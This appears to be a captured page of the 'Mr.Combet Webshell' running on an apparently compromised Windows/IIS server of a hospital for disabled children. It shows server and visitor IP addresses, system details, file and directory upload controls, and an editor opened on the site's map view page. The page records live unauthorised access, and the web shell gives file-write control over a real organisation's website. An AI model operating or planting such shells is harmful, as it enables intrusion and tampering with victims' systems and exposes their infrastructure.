Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
HRDC
/
HRDC
/
Views
/
Map
/
Edit File Name :
Index.cshtml
@{ ViewBag.Title = "HRDC-HOSPITAL & REHABILITATION for DISABLED CHILDREN"; Layout = "~/Views/Shared/DetailLayout.cshtml"; } <link rel="stylesheet" href="https://unpkg.com/leaflet@1.3.1/dist/leaflet.css" integrity="sha512-Rksm5RenBEKSKFjgI3a41vrjkw4EVPlJ3+OiI65vTjIdo9brlAacEuKOiQ5OFh7cOI1bkDwLqdLw3Zg0cRJAAQ==" crossorigin="" /> <!-- Make sure you put this AFTER Leaflet's CSS --> <script src="https://unpkg.com/leaflet@1.3.1/dist/leaflet.js" integrity="sha512-/Nsx9X4HebavoBvEBuyp3I7od5tA0UzAxs+j83KgC8PU0kgB4XiK4Lfe4y4cgBtaRJQEIFCW+oC506aPT2L1zw==" crossorigin=""></script> <h2>Map</h2> <div class="paragraph-block bottom-margin" style="height:auto"> <div id="map" style="height:400px;width:1000px"></div> </div> <script> var map = L.map('map').setView([27.6894, 85.3227], 13); L.tileLayer('http://{s}.tile.osm.org/{z}/{x}/{y}.png', { attribution: '© <a href="http://osm.org/copyright">OpenStreetMap</a> contributors' }).addTo(map); L.marker([27.6894, 85.3227]).addTo(map) .bindPopup('HRDC1.<br> Total-10.'); L.marker([27.6894, 85.3485]).addTo(map) .bindPopup('HRDC2.<br> Total-15.'); </script>
Save